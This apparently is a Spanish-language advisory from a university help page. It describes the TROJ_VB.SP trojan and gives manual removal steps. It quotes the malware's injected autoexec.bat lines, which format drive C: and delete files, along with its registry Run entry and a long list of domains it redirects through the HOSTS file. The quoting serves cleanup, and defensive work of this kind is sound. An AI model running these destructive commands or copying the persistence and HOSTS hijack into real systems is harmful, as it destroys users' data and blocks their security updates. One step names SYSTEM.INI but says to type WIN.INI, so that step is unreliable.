acerca del virus

Acerca del virus

Este troyano esta atacando los computadores de la universidad dañando los archivos de word de forma irreversible, pero su propagación se puede detener ya que solo se activa si la persona ejecuta un archivo infectado. Su nombre deriva del parecido en su forma de actuar como los astutos griegos de la mitología: llega al computador oculto en un software aparentemente inofensivo. Sin embargo, al ejecutarlo instalará en nuestro computador un segundo programa, el troyano.
Los efectos de este troyano son de alto riesgo, se han recibido reportes de daño en los documentos de texto ya que puede alterarlos y dañarlos.

TROJ_VB.SP

Conocido también como: Trojan. Horse, VB.c
Este troyano potencialmente destructor, es capaz de modificar el autoexec.bat, y darle la instrucción de que formatee C:, este troyano modifica el autoexec.bat apenas se acaba de instalar, y puede empezar a actuar cuando se reinicie el equipo y/o se cumplan ciertas condiciones para que se active.
También tiene otra rutinas maliciosas como ejecutar WORD cada que se inicia Windows.
También modifica el archivo HOSTS para bloquear URL específicas y redirigirlas a la dirección 213.159.118.226, las URLs redirigidas son las siguientes:
• 1-se.com
• 58q.com
• SymantecLiveUpdate.com
• SymantecLiveUpdated.com
• WindowsUpdate.com
• WindowsUpdated.com
• admisiones.unal.edu.co
• aifind.cc
• aifind.info
• allneedsearch.com
• approvedlinks.com
• es.Mail.Yahoo.com
• freednshosts.info
• msn.search.com
• search.msm.com
• securityresponse.symantec.com
• symantec.securityresponse.com
• www.Altavista.com
• www.AntiVirus.com
• www.Apple.com
• www.Apple.com/quicktime/download
• www.Argentina.com
• www.BasuraMail.com
• www.Bolivia.com
• www.Brazil.com
• www.CartoonNetwork.com
• www.CartoonNetworkLa.com
• www.Chile.com
• www.Colombia.com
• www.Ecuador.com
• www.EscuelaIng.com
• www.EscuelaIng.edu.co
• www.Google.com
• www.Google.com.co
• www.Hispavista.com
• www.HotMail.com
• www.IBM.com
• www.Kapersky.com
• www.LatinCards.com
• www.LatinChat.com
• www.LatinGames.com
• www.LatinMail.com
• www.Microsoft.com
• www.Microsoft.com.co
• www.Microsoft.es
• www.MundoNick.com
• www.MusicCity.com
• www.Nick.com
• www.PandaSoftware.com
• www.PandaSoftware.es
• www.Paraguay.com
• www.Planetarroba.com
• www.ProgramasFull.com
• www.Rotten.com
• www.SCO.com
• www.Sophos.com
• www.StarMedia.com
• www.Tnt.com
• www.TntLa.com
• www.Tonterias.com
• www.TrendMicro.com
• www.Uruguay.com
• www.Venezuela.com
• www.VirusList.com
• www.Yahoo.com
• www.Yahoo.es
• www.avg.com
• www.avp.com
• www.doubleclick.com
• www.icfes.gov.co
• www.msn.com
• www.sia.unal.edu.co
• www.soho.com.co
• www.symantec.com
• www.symantec.com.co
• www.terra.com
• www.udistrital.edu.co
• www.unal.edu.co

Solución:

Identificar el virus
Para esto debemos escanear el PC con un antivirus, preferiblemente TREND MICRO antivirus, si no lo tiene se puede hacer un escaneo gratuito con este antivirus a través de Internet, en la siguiente dirección:
http://ae.trendmicro-europe.com/enterprise/products/housecall_launch.php

Observe con atención que archivos están infectados.

Terminando el programa infectado.
Con este proceso se terminan los procesos infectados:
Abra el administrador de tareas:

» En Windows 95, 98, y ME, presione
CTRL+ALT+DELETE
» On Windows NT, 2000, and XP, presione
CTRL+SHIFT+ESC

luego de click en la pestaña de procesos.
En la lista de procesos corriendo identifique los programas que estan infectados, selecciónelos uno a uno y presione terminar tarea o terminar proceso.
Para verificar si se termino el proceso cierre el administrador de tareas y vuelva a iniciarlo para ver si los programas realmente terminaron.
Ahora finalmente cierre el administrador de tareas.

*NOTA: En sistemas con Windows 95, 98, and ME, el administrador de tareas de Windows podría no mostrar ciertos procesos. Se puede usar un explorador de procesos para terminar dichos procesos. Uno puede ser Process Explorer http://www.sysinternals.com/ntw2k/freeware/procexp.shtml.
Si pudo terminar el proceso siga con lo siguiente:

Eliminando entradas de autoarranque del registro de Windows.
Eliminando estas entradas prevenimos que el virus se ejecute al inicio del sistema.
Abra el editor del registro:
De Click en el botón de inicio, luego elija ejecutar, y en la caja de dialogo escriba REGEDIT, y presione ENTER.

En el panel del lado izquierdo, de doble clic en lo siguiente:
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>
Windows>CurrentVersion>Run
En el panel derecho, localice y elimine la siguiente entrada o línea:
DllExecutable = "%Windows%\MsRunDll32.exe"
Cierre el editor de windows.
Si usted no es capaz de terminar el proceso del archivo infectado, reinicie el sistema y repita.

Eliminar entradas de autoarranque de archivos del sistema
Este virus a veces modifica archivos del sistema, así se ejecuta cada vez que se inicia Windows. Estas entradas de autoarranque tienen que ser eliminadas antes de que un sistema infectado pueda ser reiniciado con seguridad.
Abra el archive SYSTEM.INI, así:
De Click en el botón de inicio, luego elija ejecutar, y en la caja de dialogo escriba WIN.INI, y presione ENTER, se abrirá el archivo en un editor de texto, usualmente Notepad.
Busque en el archivo y en la sección de Windows localice la línea que comienza con:
Run=
En esa misma línea borre el camino y nombre del archivo infectado:
%Windows%\MsRunDll32.exe
In System Configuration Editor, select the AUTOEXEC.BAT window.
Locate and delete the following lines:
@Echo off
Rem Do not REMOVE the next lines
Rem Required by System Protocol
Win %Windows%\MsRunDll32.exe

and,

Rundll.exe user,exitwindows
Rundll32.exe user,exitwindows
-----------------------------------
Format /y c:
Format c:
format /v c:

@Del c:\*.e*
Close System Configuration Editor and click Yes when prompted to save.

Eliminando entradas infectadas del archive HOSTS
Eliminando estas entradas arreglaremos los cambios que se hicieron en el archivo.
Abra un editor de textos como notepad y abra el archivo:
En Windows 95, 98 y Millenio:
C:\WINDOWS\system\drivers\etc\hosts
En Windows 2000, XP:
C:\WINDOWS\system32\drivers\etc\hosts
Elimine las siguientes entradas:
• 1-se.com
• 58q.com
• SymantecLiveUpdate.com
• SymantecLiveUpdated.com
• WindowsUpdate.com
• WindowsUpdated.com
• admisiones.unal.edu.co
• aifind.cc
• aifind.info
• allneedsearch.com
• approvedlinks.com
• es.Mail.Yahoo.com
• freednshosts.info
• msn.search.com
• search.msm.com
• securityresponse.symantec.com
• symantec.securityresponse.com
• www.Altavista.com
• www.AntiVirus.com
• www.Apple.com
• www.Apple.com/quicktime/download
• www.Argentina.com
• www.BasuraMail.com
• www.Bolivia.com
• www.Brazil.com
• www.CartoonNetwork.com
• www.CartoonNetworkLa.com
• www.Chile.com
• www.Colombia.com
• www.Ecuador.com
• www.EscuelaIng.com
• www.EscuelaIng.edu.co
• www.Google.com
• www.Google.com.co
• www.Hispavista.com
• www.HotMail.com
• www.IBM.com
• www.Kapersky.com
• www.LatinCards.com
• www.LatinChat.com
• www.LatinGames.com
• www.LatinMail.com
• www.Microsoft.com
• www.Microsoft.com.co
• www.Microsoft.es
• www.MundoNick.com
• www.MusicCity.com
• www.Nick.com
• www.PandaSoftware.com
• www.PandaSoftware.es
• www.Paraguay.com
• www.Planetarroba.com
• www.ProgramasFull.com
• www.Rotten.com
• www.SCO.com
• www.Sophos.com
• www.StarMedia.com
• www.Tnt.com
• www.TntLa.com
• www.Tonterias.com
• www.TrendMicro.com
• www.Uruguay.com
• www.Venezuela.com
• www.VirusList.com
• www.Yahoo.com
• www.Yahoo.es
• www.avg.com
• www.avp.com
• www.doubleclick.com
• www.icfes.gov.co
• www.msn.com
• www.sia.unal.edu.co
• www.soho.com.co
• www.symantec.com
• www.symantec.com.co
• www.terra.com
• www.udistrital.edu.co
• www.unal.edu.co
Guarde el archivo y salga del editor de textos.

Instrucciones adicionales para limpiar Windows ME/XP
Usuarios que tengan Windows ME o XP tiene que deshabilitar la restauracion del sistema en el siguiente enlace se dan las instrucciones.
http://www.trendmicro.com/en/security/advisories/win_me_clean.htm